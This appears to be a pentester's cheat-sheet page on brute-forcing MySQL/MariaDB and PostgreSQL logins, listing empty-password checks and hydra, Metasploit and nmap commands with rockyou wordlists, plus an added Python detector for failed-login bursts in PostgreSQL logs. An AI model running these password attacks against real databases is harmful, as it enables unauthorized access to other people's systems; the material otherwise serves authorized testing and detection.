Brute-forcing Databases

assuming you have your dictionaries ready

MySQL / MariaDB

first check that it responds and that you cannot simply log in as root without a password or with an empty password

apt install mariadb-client

mysql -u root -h $target
mysql -u root -h $target -p

and check again if there’s a specific username you’re expecting

PostgreSQL

first check that it responds and that you cannot simply log in as postgres without a password or with an empty password

apt install postgresql-client

psql -U postgres -h $target
psql -U postgres -w -h $target

and check again if there’s a specific username you’re expecting

Ready to go

hydra

apt install hydra

usernames=/usr/share/wordlists/usernames.concat.txt
passwords=/usr/share/wordlists/rockyou.txt

mariadb

hydra -l root -P $passwords $target mysql

postgres

hydra -L $usernames -P $passwords $target postgres

msf

postgres

use auxiliary/scanner/postgres/postgres_login
show options
set BLANK_PASSWORDS true
set DATABASE postgres
set RHOSTS TARGET-HERE
run

nmap

postgres

nmap -p 5432 --script pgsql-brute $target
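
Seen from the server side, the hydra, msf and nmap runs above each leave a burst of failed-authentication lines in the PostgreSQL log. The following is an added example, not part of the original page: a small Python detector run over constructed log lines, assuming log_line_prefix = '%m [%p] %h ' so that the client address is logged; the function name, thresholds and sample addresses are illustrative.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumption: postgresql.conf has log_line_prefix = '%m [%p] %h '
# (timestamp, backend PID, client host). Other prefixes need another regex.
LINE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ \S+ \[\d+\] '
    r'(?P<host>\S+) FATAL:\s+password authentication failed '
    r'for user "(?P<user>[^"]*)"'
)

def find_bruteforce(lines, threshold=5, window_s=60):
    """Return {client: sorted usernames tried} for every client with at
    least `threshold` failed logins inside a sliding `window_s` seconds."""
    events = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events[m["host"]].append((ts, m["user"]))
    flagged = {}
    for host, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Shrink the window from the left until it spans <= window_s.
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged[host] = sorted({user for _, user in evs})
                break
    return flagged

# Constructed sample log: one noisy client, one user mistyping a password.
TRIED = ["postgres", "postgres", "admin", "postgres", "admin", "postgres"]
SAMPLE = [
    f'2024-05-01 12:00:{s:02d}.000 UTC [{4000 + s}] 203.0.113.7 FATAL:  '
    f'password authentication failed for user "{u}"'
    for s, u in enumerate(TRIED)
] + [
    '2024-05-01 12:01:00.000 UTC [4100] 198.51.100.4 FATAL:  '
    'password authentication failed for user "app"',
    '2024-05-01 12:06:00.000 UTC [4101] 198.51.100.4 FATAL:  '
    'password authentication failed for user "app"',
    '2024-05-01 12:06:05.000 UTC [4102] 198.51.100.4 LOG:  '
    'connection authorized: user=app database=app',
]

if __name__ == "__main__":
    for host, users in find_bruteforce(SAMPLE).items():
        print(f"{host}: repeated failed logins for {', '.join(users)}")
```

Tune threshold and window_s to the environment; slow password spraying needs a longer window than the default shown here.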

Resources

Password Cracking:PostgreSQL https://www.hackingarticles.in/6-ways-to-hack-postgressql-login/

A Penetration Tester’s Guide to PostgreSQL https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9

pgsql-brute NSE Script https://nmap.org/nsedoc/scripts/pgsql-brute.html


Copyright © 2024 Pierre-Philipp Braun